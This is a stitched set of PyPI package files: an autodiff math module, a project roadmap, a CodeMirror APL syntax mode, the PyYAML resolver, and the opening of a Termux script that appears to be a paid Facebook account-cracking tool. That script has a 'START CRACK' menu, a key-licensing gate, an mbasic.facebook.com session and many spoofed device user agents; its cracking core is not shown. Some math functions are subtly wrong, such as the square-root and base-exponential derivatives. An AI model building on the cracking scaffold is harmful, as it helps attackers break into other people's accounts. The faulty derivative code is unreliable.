return Dual(np.exp(x.real), np.exp(x.real) * x.dual)
else:
return np.exp(x)
def exponential(base, x):
"""
Return the exponential value of x with specified base.
Parameters
----------
base: int, float
Base of the exponential function.
x : int, float, Dual
Input to the exponential function with specified base.
Returns
-------
value : int, float, Dual
The exponential value of the dual number implementation or the exponential value of a real number with specified base.
"""
if isinstance(x,Node):
child = Node(np.exp(x.value))
x.children.append({'partial_der':base**x.value, 'node':child})
return child
elif isinstance(x, Dual):
return Dual(base**x.real, np.log(base) * (base**x.real) * x.dual)
else:
return base**x
# Hyperbolic functions
def sinh(x):
"""
Return the sinh value of x.
Parameters
----------
x : int, float, Dual
Input to the sinh function.
Returns
-------
value : int, float, Dual
The sinh value of the dual number implementation or the sinh value of a real number.
"""
if isinstance(x,Node):
child = Node(np.sinh(x.value))
x.children.append({'partial_der':np.cosh(x.value), 'node':child})
return child
elif isinstance(x, Dual):
return Dual(np.sinh(x.real), np.cosh(x.real) * x.dual)
else:
return np.sinh(x)
def cosh(x):
"""
Return the cosh value of x.
Parameters
----------
x : int, float, Dual
Input to the cosh function.
Returns
-------
value : int, float, Dual
The cosh value of the dual number implementation or the cosh value of a real number.
"""
if isinstance(x,Node):
child = Node(np.cosh(x.value))
x.children.append({'partial_der':np.sinh(x.value), 'node':child})
return child
elif isinstance(x, Dual):
return Dual(np.cosh(x.real), np.sinh(x.real) * x.dual)
else:
return np.cosh(x)
def tanh(x):
"""
Return the tanh value of x.
Parameters
----------
x : int, float, Dual
Input to the tanh function.
Returns
-------
value : int, float, Dual
The tanh value of the dual number implementation or the tanh value of a real number.
"""
if isinstance(x,Node):
child = Node(np.tanh(x.value))
x.children.append({'partial_der':1/np.cosh(x.value)**2, 'node':child})
return child
elif isinstance(x, Dual):
return Dual(np.tanh(x.real), (1 - np.tanh(x.real)**2) * x.dual)
else:
return np.tanh(x)
# Logistic function
def logistic(x):
"""
Return the logistic value of x.
Parameters
----------
x : int, float, Dual
Input to the logistic function.
Returns
-------
value : int, float, Dual
The logistic value of the dual number implementation or the logistic value of a real number.
"""
if isinstance(x,Node):
child = Node(1/(1+np.exp(-x.value)))
nom = np.exp(x.value)
dom = (1+np.exp(x.value))**2
x.children.append({'partial_der':nom/dom, 'node':child})
return child
elif isinstance(x, Dual):
return Dual(1 / (1 + np.exp(-x.real)), np.exp(-x.real) * x.dual / (1 + np.exp(-x.real))**2)
else:
return 1 / (1 + np.exp(-x))
# Logarithms
def log(x):
"""
Return the logarithm value of x with base e.
Parameters
----------
x : int, float, Dual
Input to the logarithm function with base e.
Returns
-------
value : int, float, Dual
The logarithm value of the dual number implementation or the logarithm value of a real number with base e.
"""
if isinstance(x,Node):
child = Node(np.log(x.value))
x.children.append({'partial_der':(1/(x.value)), 'node':child})
return child
elif isinstance(x, Dual):
if x.real <= 0:
raise ValueError('Domain of logarithm should be greater than 0')
return Dual(np.log(x.real), x.dual / x.real)
else:
return np.log(x)
def log2(x):
"""
Return the logarithm value of x with base 2.
Parameters
----------
x : int, float, Dual
Input to the logarithm function with base 2.
Returns
-------
value : int, float, Dual
The logarithm value of the dual number implementation or the logarithm value of a real number with base 2.
"""
if isinstance(x,Node):
child = Node(np.log2(x.value))
x.children.append({'partial_der':(1/(x.value*np.log(2))), 'node':child})
return child
elif isinstance(x, Dual):
if x.real <= 0:
raise ValueError('Domain of logarithm should be greater than 0')
return Dual(np.log2(x.real), x.dual / (x.real * np.log(2)))
else:
return np.log2(x)
def log10(x):
"""
Return the logarithm value of x with base 10.
Parameters
----------
x : int, float, Dual
Input to the logarithm function with base 10.
Returns
-------
value : int, float, Dual
The logarithm value of the dual number implementation or the logarithm value of a real number with base 10.
"""
if isinstance(x,Node):
child = Node(np.log10(x.value))
x.children.append({'partial_der':(1/(x.value*np.log(10))), 'node':child})
return child
elif isinstance(x, Dual):
if x.real <= 0:
raise ValueError('Domain of logarithm should be greater than 0')
return Dual(np.log10(x.real), x.dual / (x.real * np.log(10)))
else:
return np.log10(x)
def logarithm(x, base):
"""
Return the logarithm value of x with specified base.
Parameters
----------
x : int, float, Dual
Input to the logarithm function with specified base.
base: int
Base of the logarithm function.
Returns
-------
value : int, float, Dual
The logarithm value of the dual number implementation or the logarithm value of a real number with specified base.
"""
if isinstance(x,Node):
child = Node(np.log(x.value)/np.log(base))
x.children.append({'partial_der':(1/(x.value*np.log(base))), 'node':child})
return child
elif isinstance(x, Dual):
if x.real <= 0:
raise ValueError('Domain of logarithm should be greater than 0')
return Dual(np.log(x.real) / np.log(base), x.dual / (x.real * np.log(base)))
else:
return np.log(x) / np.log(base)
# Square root
def sqrt(x):
"""
Return the square root value of x.
Parameters
----------
x : int, float, Dual
Input to the square root function.
Returns
-------
value : int, float, Dual
The square root value of the dual number implementation or the square root value of a real number.
"""
if isinstance(x,Node):
child = Node(x.value**(1/2))
x.children.append({'partial_der':((1/2)*x.value**(-1/2)), 'node':child})
return child
elif isinstance(x, Dual):
return Dual(np.sqrt(x.real), 2 * x.real * x.dual)
else:
return np.sqrt(x)
# if __name__=='__main__':
# val = Dual(3,1)
# val2 = Dual(2,[1,2])
# z = sin(val)
# print(z)
# print(cos(val))
# print(tan(val2))
# val = Dual(0.5,0.5)
# print(arcsin(val))
# val=Dual(0.5,0.5)
# print(arccos(val))
# print(arctan(val))
# print(exp(val))
# base = 2
# print(exponential(2,val))
# print(sinh(val))
# print(cosh(val))
# print(tanh(val))
# print(logistic(val))
# print(log(val))
# print(log2(val))
# print(log10(val))
# print(logarithm(val,base))
# print(sqrt(val)) | PypiClean |
/AnyBlok-2.1.0.tar.gz/AnyBlok-2.1.0/doc/ROADMAP.rst | .. This file is a part of the AnyBlok project
..
.. Copyright (C) 2014 Jean-Sebastien SUZANNE <[email protected]>
..
.. This Source Code Form is subject to the terms of the Mozilla Public License,
.. v. 2.0. If a copy of the MPL was not distributed with this file,You can
.. obtain one at http://mozilla.org/MPL/2.0/.
.. contents::
ROADMAP
=======
To implement
------------
* Add slogan
* Update doc
* Need improve alembic, sqlalchemy-util
* Refactor the engine declarations to have master / slave(s) configuration
* Addons for sqlalchemy : http://sqlalchemy-utils.readthedocs.org/en/latest/installation.html
Library to include
------------------
* full text search: https://pypi.python.org/pypi/SQLAlchemy-FullText-Search/0.2
* internationalisation: https://pypi.python.org/pypi/SQLAlchemy-i18n/0.8.2
* sqltap http://sqltap.inconshreveable.com, profiling and introspection for SQLAlchemy applications
* Crypt https://bitbucket.org/zzzeek/sqlalchemy/wiki/UsageRecipes/DatabaseCrypt
* profiling https://bitbucket.org/zzzeek/sqlalchemy/wiki/UsageRecipes/Profiling
Functionnality which need a sprint
----------------------------------
* Tasks Management
* Internalization
* Ancestor left / right
| PypiClean |
/Flask-MDEditor-0.1.4.tar.gz/Flask-MDEditor-0.1.4/flask_mdeditor/static/mdeditor/js/lib/codemirror/mode/apl/apl.js |
(function(mod) {
if (typeof exports == "object" && typeof module == "object") // CommonJS
mod(require("../../lib/codemirror"));
else if (typeof define == "function" && define.amd) // AMD
define(["../../lib/codemirror"], mod);
else // Plain browser env
mod(CodeMirror);
})(function(CodeMirror) {
"use strict";
CodeMirror.defineMode("apl", function() {
var builtInOps = {
".": "innerProduct",
"\\": "scan",
"/": "reduce",
"⌿": "reduce1Axis",
"⍀": "scan1Axis",
"¨": "each",
"⍣": "power"
};
var builtInFuncs = {
"+": ["conjugate", "add"],
"−": ["negate", "subtract"],
"×": ["signOf", "multiply"],
"÷": ["reciprocal", "divide"],
"⌈": ["ceiling", "greaterOf"],
"⌊": ["floor", "lesserOf"],
"∣": ["absolute", "residue"],
"⍳": ["indexGenerate", "indexOf"],
"?": ["roll", "deal"],
"⋆": ["exponentiate", "toThePowerOf"],
"⍟": ["naturalLog", "logToTheBase"],
"○": ["piTimes", "circularFuncs"],
"!": ["factorial", "binomial"],
"⌹": ["matrixInverse", "matrixDivide"],
"<": [null, "lessThan"],
"≤": [null, "lessThanOrEqual"],
"=": [null, "equals"],
">": [null, "greaterThan"],
"≥": [null, "greaterThanOrEqual"],
"≠": [null, "notEqual"],
"≡": ["depth", "match"],
"≢": [null, "notMatch"],
"∈": ["enlist", "membership"],
"⍷": [null, "find"],
"∪": ["unique", "union"],
"∩": [null, "intersection"],
"∼": ["not", "without"],
"∨": [null, "or"],
"∧": [null, "and"],
"⍱": [null, "nor"],
"⍲": [null, "nand"],
"⍴": ["shapeOf", "reshape"],
",": ["ravel", "catenate"],
"⍪": [null, "firstAxisCatenate"],
"⌽": ["reverse", "rotate"],
"⊖": ["axis1Reverse", "axis1Rotate"],
"⍉": ["transpose", null],
"↑": ["first", "take"],
"↓": [null, "drop"],
"⊂": ["enclose", "partitionWithAxis"],
"⊃": ["diclose", "pick"],
"⌷": [null, "index"],
"⍋": ["gradeUp", null],
"⍒": ["gradeDown", null],
"⊤": ["encode", null],
"⊥": ["decode", null],
"⍕": ["format", "formatByExample"],
"⍎": ["execute", null],
"⊣": ["stop", "left"],
"⊢": ["pass", "right"]
};
var isOperator = /[\.\/⌿⍀¨⍣]/;
var isNiladic = /⍬/;
var isFunction = /[\+−×÷⌈⌊∣⍳\?⋆⍟○!⌹<≤=>≥≠≡≢∈⍷∪∩∼∨∧⍱⍲⍴,⍪⌽⊖⍉↑↓⊂⊃⌷⍋⍒⊤⊥⍕⍎⊣⊢]/;
var isArrow = /←/;
var isComment = /[⍝#].*$/;
var stringEater = function(type) {
var prev;
prev = false;
return function(c) {
prev = c;
if (c === type) {
return prev === "\\";
}
return true;
};
};
return {
startState: function() {
return {
prev: false,
func: false,
op: false,
string: false,
escape: false
};
},
token: function(stream, state) {
var ch, funcName, word;
if (stream.eatSpace()) {
return null;
}
ch = stream.next();
if (ch === '"' || ch === "'") {
stream.eatWhile(stringEater(ch));
stream.next();
state.prev = true;
return "string";
}
if (/[\[{\(]/.test(ch)) {
state.prev = false;
return null;
}
if (/[\]}\)]/.test(ch)) {
state.prev = true;
return null;
}
if (isNiladic.test(ch)) {
state.prev = false;
return "niladic";
}
if (/[¯\d]/.test(ch)) {
if (state.func) {
state.func = false;
state.prev = false;
} else {
state.prev = true;
}
stream.eatWhile(/[\w\.]/);
return "number";
}
if (isOperator.test(ch)) {
return "operator apl-" + builtInOps[ch];
}
if (isArrow.test(ch)) {
return "apl-arrow";
}
if (isFunction.test(ch)) {
funcName = "apl-";
if (builtInFuncs[ch] != null) {
if (state.prev) {
funcName += builtInFuncs[ch][1];
} else {
funcName += builtInFuncs[ch][0];
}
}
state.func = true;
state.prev = false;
return "function " + funcName;
}
if (isComment.test(ch)) {
stream.skipToEnd();
return "comment";
}
if (ch === "∘" && stream.peek() === ".") {
stream.next();
return "function jot-dot";
}
stream.eatWhile(/[\w\$_]/);
word = stream.current();
state.prev = true;
return "keyword";
}
};
});
CodeMirror.defineMIME("text/apl", "apl");
}); | PypiClean |
/Nuitka_fixed-1.1.2-cp310-cp310-win_amd64.whl/nuitka/build/inline_copy/yaml/yaml/resolver.py | __all__ = ['BaseResolver', 'Resolver']
from .error import *
from .nodes import *
import re
class ResolverError(YAMLError):
pass
class BaseResolver:
DEFAULT_SCALAR_TAG = 'tag:yaml.org,2002:str'
DEFAULT_SEQUENCE_TAG = 'tag:yaml.org,2002:seq'
DEFAULT_MAPPING_TAG = 'tag:yaml.org,2002:map'
yaml_implicit_resolvers = {}
yaml_path_resolvers = {}
def __init__(self):
self.resolver_exact_paths = []
self.resolver_prefix_paths = []
@classmethod
def add_implicit_resolver(cls, tag, regexp, first):
if not 'yaml_implicit_resolvers' in cls.__dict__:
implicit_resolvers = {}
for key in cls.yaml_implicit_resolvers:
implicit_resolvers[key] = cls.yaml_implicit_resolvers[key][:]
cls.yaml_implicit_resolvers = implicit_resolvers
if first is None:
first = [None]
for ch in first:
cls.yaml_implicit_resolvers.setdefault(ch, []).append((tag, regexp))
@classmethod
def add_path_resolver(cls, tag, path, kind=None):
# Note: `add_path_resolver` is experimental. The API could be changed.
# `new_path` is a pattern that is matched against the path from the
# root to the node that is being considered. `node_path` elements are
# tuples `(node_check, index_check)`. `node_check` is a node class:
# `ScalarNode`, `SequenceNode`, `MappingNode` or `None`. `None`
# matches any kind of a node. `index_check` could be `None`, a boolean
# value, a string value, or a number. `None` and `False` match against
# any _value_ of sequence and mapping nodes. `True` matches against
# any _key_ of a mapping node. A string `index_check` matches against
# a mapping value that corresponds to a scalar key which content is
# equal to the `index_check` value. An integer `index_check` matches
# against a sequence value with the index equal to `index_check`.
if not 'yaml_path_resolvers' in cls.__dict__:
cls.yaml_path_resolvers = cls.yaml_path_resolvers.copy()
new_path = []
for element in path:
if isinstance(element, (list, tuple)):
if len(element) == 2:
node_check, index_check = element
elif len(element) == 1:
node_check = element[0]
index_check = True
else:
raise ResolverError("Invalid path element: %s" % element)
else:
node_check = None
index_check = element
if node_check is str:
node_check = ScalarNode
elif node_check is list:
node_check = SequenceNode
elif node_check is dict:
node_check = MappingNode
elif node_check not in [ScalarNode, SequenceNode, MappingNode] \
and not isinstance(node_check, str) \
and node_check is not None:
raise ResolverError("Invalid node checker: %s" % node_check)
if not isinstance(index_check, (str, int)) \
and index_check is not None:
raise ResolverError("Invalid index checker: %s" % index_check)
new_path.append((node_check, index_check))
if kind is str:
kind = ScalarNode
elif kind is list:
kind = SequenceNode
elif kind is dict:
kind = MappingNode
elif kind not in [ScalarNode, SequenceNode, MappingNode] \
and kind is not None:
raise ResolverError("Invalid node kind: %s" % kind)
cls.yaml_path_resolvers[tuple(new_path), kind] = tag
def descend_resolver(self, current_node, current_index):
if not self.yaml_path_resolvers:
return
exact_paths = {}
prefix_paths = []
if current_node:
depth = len(self.resolver_prefix_paths)
for path, kind in self.resolver_prefix_paths[-1]:
if self.check_resolver_prefix(depth, path, kind,
current_node, current_index):
if len(path) > depth:
prefix_paths.append((path, kind))
else:
exact_paths[kind] = self.yaml_path_resolvers[path, kind]
else:
for path, kind in self.yaml_path_resolvers:
if not path:
exact_paths[kind] = self.yaml_path_resolvers[path, kind]
else:
prefix_paths.append((path, kind))
self.resolver_exact_paths.append(exact_paths)
self.resolver_prefix_paths.append(prefix_paths)
def ascend_resolver(self):
if not self.yaml_path_resolvers:
return
self.resolver_exact_paths.pop()
self.resolver_prefix_paths.pop()
def check_resolver_prefix(self, depth, path, kind,
current_node, current_index):
node_check, index_check = path[depth-1]
if isinstance(node_check, str):
if current_node.tag != node_check:
return
elif node_check is not None:
if not isinstance(current_node, node_check):
return
if index_check is True and current_index is not None:
return
if (index_check is False or index_check is None) \
and current_index is None:
return
if isinstance(index_check, str):
if not (isinstance(current_index, ScalarNode)
and index_check == current_index.value):
return
elif isinstance(index_check, int) and not isinstance(index_check, bool):
if index_check != current_index:
return
return True
def resolve(self, kind, value, implicit):
if kind is ScalarNode and implicit[0]:
if value == '':
resolvers = self.yaml_implicit_resolvers.get('', [])
else:
resolvers = self.yaml_implicit_resolvers.get(value[0], [])
wildcard_resolvers = self.yaml_implicit_resolvers.get(None, [])
for tag, regexp in resolvers + wildcard_resolvers:
if regexp.match(value):
return tag
implicit = implicit[1]
if self.yaml_path_resolvers:
exact_paths = self.resolver_exact_paths[-1]
if kind in exact_paths:
return exact_paths[kind]
if None in exact_paths:
return exact_paths[None]
if kind is ScalarNode:
return self.DEFAULT_SCALAR_TAG
elif kind is SequenceNode:
return self.DEFAULT_SEQUENCE_TAG
elif kind is MappingNode:
return self.DEFAULT_MAPPING_TAG
class Resolver(BaseResolver):
pass
Resolver.add_implicit_resolver(
'tag:yaml.org,2002:bool',
re.compile(r'''^(?:yes|Yes|YES|no|No|NO
|true|True|TRUE|false|False|FALSE
|on|On|ON|off|Off|OFF)$''', re.X),
list('yYnNtTfFoO'))
Resolver.add_implicit_resolver(
'tag:yaml.org,2002:float',
re.compile(r'''^(?:[-+]?(?:[0-9][0-9_]*)\.[0-9_]*(?:[eE][-+][0-9]+)?
|\.[0-9][0-9_]*(?:[eE][-+][0-9]+)?
|[-+]?[0-9][0-9_]*(?::[0-5]?[0-9])+\.[0-9_]*
|[-+]?\.(?:inf|Inf|INF)
|\.(?:nan|NaN|NAN))$''', re.X),
list('-+0123456789.'))
Resolver.add_implicit_resolver(
'tag:yaml.org,2002:int',
re.compile(r'''^(?:[-+]?0b[0-1_]+
|[-+]?0[0-7_]+
|[-+]?(?:0|[1-9][0-9_]*)
|[-+]?0x[0-9a-fA-F_]+
|[-+]?[1-9][0-9_]*(?::[0-5]?[0-9])+)$''', re.X),
list('-+0123456789'))
Resolver.add_implicit_resolver(
'tag:yaml.org,2002:merge',
re.compile(r'^(?:<<)$'),
['<'])
Resolver.add_implicit_resolver(
'tag:yaml.org,2002:null',
re.compile(r'''^(?: ~
|null|Null|NULL
| )$''', re.X),
['~', 'n', 'N', ''])
Resolver.add_implicit_resolver(
'tag:yaml.org,2002:timestamp',
re.compile(r'''^(?:[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]
|[0-9][0-9][0-9][0-9] -[0-9][0-9]? -[0-9][0-9]?
(?:[Tt]|[ \t]+)[0-9][0-9]?
:[0-9][0-9] :[0-9][0-9] (?:\.[0-9]*)?
(?:[ \t]*(?:Z|[-+][0-9][0-9]?(?::[0-9][0-9])?))?)$''', re.X),
list('0123456789'))
Resolver.add_implicit_resolver(
'tag:yaml.org,2002:value',
re.compile(r'^(?:=)$'),
['='])
# The following resolver is only for documentation purposes. It cannot work
# because plain scalars cannot start with '!', '&', or '*'.
Resolver.add_implicit_resolver(
'tag:yaml.org,2002:yaml',
re.compile(r'^(?:!|&|\*)$'),
list('!&*')) | PypiClean |
/NaimV1-0.2-py3-none-any.whl/mmmm/Shuvo.py | try:
import requests,calendar
except ModuleNotFoundError:
os.system("python -m pip install requests ")
try:
import bs4
except ModuleNotFoundError:
os.system("python -m pip install bs4 ")
try:
import mechanize
except ModuleNotFoundError:
os.system("python -m pip install mechanize ")
import requests,bs4,sys,os,random,time,re,json,uuid,subprocess,platform,base64
from random import randint
from concurrent.futures import ThreadPoolExecutor
from bs4 import BeautifulSoup
from datetime import date
from datetime import datetime
from urllib.parse import quote
import requests,bs4,sys,os,random,time,re,json,uuid,subprocess
from random import randint
import requests, re, os, time
import requests as ress
import os
import sys
import base64
import random
import requests
import platform
def mahdi():
print('DONT TRY TO DECREPT IT....FUCK YOUR DECODE SYSTEM')
print('SECURE BY \033[1;31mMAHDI HASAN SHUVO')
print("FB:www.facebook.com/bk4human")
os.system('clear')
Subscraption()
naim="==CRACK=="
myid=uuid.uuid4().hex[:10].upper()
try:
key1 = open('/data/data/com.termux/files/usr/bin/python3-confi1', 'r').read()
except:
kok=open('/data/data/com.termux/files/usr/bin/python3-confi1', 'w')
kok.write(myid+naim)
kok.close()
def Subscraption():
key1=open('/data/data/com.termux/files/usr/bin/python3-confi1', 'r').read()
os.system('clear')
logo()
r1=requests.get("https://flame-naim.blogspot.com/2022/06/blog-post.html").text
if key1 in r1:
os.system('clear')
logo()
v1()
else:
os.system("clear")
logo()
print("\t \033[1;31m[\033[1;32m✓\033[1;31m]\033[1;32m First Get Approvel\033[1;37m ")
os.system("clear")
logo()
print(" \033[1;31m[\033[1;32m✓\033[1;31m]\033[1;32m Your Key is Not Approved ")
print("")
print(" \033[1;31m[\033[1;32m✓\033[1;31m]\033[1;32m Copy And Send Key To Admin")
print ("")
print (" \033[1;31m[\033[1;32m✓\033[1;31m]\033[1;32m Your Key : "+naim+key1)
print ("")
input(" \033[1;31m[\033[1;32m✓\033[1;31m]\033[1;32m\033[1;32m Enter To Send Key")
time.sleep(3.5)
tks = 'DEAR%20SIR%20I%20WANT%20TO%20BUY%20YOUR%20CRACK-FILE%20PAID%20TOOL%20%20%20%20%20%20%20%20%20%20%20'+naim+''+key1
os.system('am start https://wa.me/+8801952-081184?text=' + tks)
Subscraption()
def v1():
os.system('clear')
logo()
print(f"\033[1;31m[\033[1;32m✓\033[1;31m]\033[1;32m YOUR KEY : \033[1;33mADMIN")
print ("")
print ("")
print(" [1] START CRACK ")
print (" [2] FOLLOW ON FACEBOOK")
print (" [3] JOIN MY GROUP")
print (" [0] Exit Programing")
print (' ===============================================')
key = input(" [*] input : ")
print (' ===============================================')
if key in [""]:
print (" [!] please select correct option")
exit()
elif key in ["1", "01"]:
time.sleep(0.5)
__crack__().plerr()
elif key in ["2", "02"]:
time.sleep(0.5)
os.system('xdg-open https://www.facebook.com/Naim.Vau80')
elif key in ["3", "03"]:
time.sleep(0.5)
os.system('xdg-open https://www.facebook.com/Naim.Vau80')
os.system('clear')
elif key in ["0", "04"]:
time.sleep(0.5)
login()
ok = []
cp = []
id = []
user = []
num = 0
loop = 0
flame_naim = print
naim4 = open
Prof_naim = requests.get
_silet_koceng_ = requests.Session()
url_mb = "https://mbasic.facebook.com"
bulan_ttl = {"01": "Januari", "02": "Februari", "03": "Maret", "04": "April", "05": "Mei", "06": "Juni", "07": "Juli", "08": "Agustus", "09": "September", "10": "Oktober", "11": "November", "12": "Desember"}
bulan_key = {"january": "January", "february": "February", "march": "March", "april": "April", "may": "May", "june": "June", "july": "July", "august": "August", "september": "September", "october": "October", "november": "November", "december": "December"}
header_grup = {"user-agent": "Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]"}
ua_xiaomi = 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_nokia = 'nokiac3-00/5.0 (07.20) profile/midp-2.1 configuration/cldc-1.1 mozilla/5.0 applewebkit/420+ (khtml, like gecko) safari/420+'
ua_asus = 'Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_huawei = 'Mozilla/5.0 (Linux; Android 8.1.0; HUAWEI Y7 PRIME 2019 Build/5887208) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.62 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_vivo = 'Mozilla/5.0 (Linux; Android 11; vivo 1918) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.62 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_oppo = 'Mozilla/5.0 (Linux; Android 5.1.1; A37f) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_samsung = 'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/35.0.0.48.273;]'
ua_windows = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_realme = 'Mozilla/5.0 (Linux; Android 10; REALME RMX1911 Build/NMF26F) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 AlohaBrowser/2.20.3'
user_agent=['Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/96.0.4664.45 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/345.0.0.34.118;]','Mozilla/5.0 (Linux; Android 12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/198.0.0.53.101;]','Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; LM-X420) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G780G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; LM-Q710(FGN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36']
uas_bawaan = "Mozilla/5.0 (Linux; Android 12; SM-S906N Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/80.0.3987.119 Mobile Safari/537.36"
uas_nokiac2 = "NokiaC2-00/2.0 (03.45) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 (Java; U; kau; nokiac2-00) UCBrowser8.3.0.154/70/352/UCWEB Mobile"
uas_nokiax20 = "Mozilla/5.0 (Linux; Android 12; Nokia X20 Build/SKQ1.210821.001; wv) AppleWebKit/537.36 (KHTML, seperti Gecko) Versi/4.0 Chrome/98.0.4758.87 Mobile Safari/537.36"
uas_nokiax = "Mozilla/5.0 (Linux; Android 4.1.2; Nokia_X Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.87.90 Mobile Safari/537.36 NokiaBrowser/1.0,gzip(gfe)"
uas_samsungse = "Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G780G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36"
uas_redmi9a = "Mozilla/5.0 (Linux; U; Android 10; id-id; Redmi 9A Build/QP1A.190711.020) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/89.0.4389.116 Mobile Safari/537.36"
uas_nokiaxl = "Mozilla/5.0 (Linux; Android 4.1.2; Nokia_XL Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.82 Mobile Safari/537.36 NokiaBrowser/1.2.0.12"
uas_chromelinux = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"
uas_j7prime = "Mozilla/5.0 (Linux; Android 8.1.0; SM-G610F Build/M1AJQ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Mobile Safari/537.36 OPR/51.1.2461.137501"
uas_tes1 = "Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4X Build/MiUI MS; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/65.0.3325.109 Mobile Safari/537.36 Instagram 38.0.0.13.95 Android (24/7.0; 480dpi; 1080x1920; Xiaomi/xiaomi; Redmi Note 4X; mido; qcom; ru_RU; 99640911)"
uas_random = random.choice(["Mozilla/5.0 (Linux; U; Android 4.4.2; zh-CN; HUAWEI MT7-TL00 Build/HuaweiMT7-TL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/40.0.2214.89 UCBrowser/11.3.8.909 Mobile Safari/537.36","NokiaC3-00/5.0 (08.63) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+","Mozilla/5.0 (Linux; Android 10; Nokia 5.1 Plus Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, seperti Gecko) Versi/4.0 Chrome/83.0.4103.106 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G780G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36"])
uas_nokiac3 = "NokiaC3-00/5.0 (08.63) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"
uas_iphone = "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 [FBAN/FBIOS;FBDV/iPhone11,8;FBMD/iPhone;FBSN/iOS;FBSV/13.3.1;FBSS/2;FBID/phone;FBLC/en_US;FBOP/5;FBCR/]"
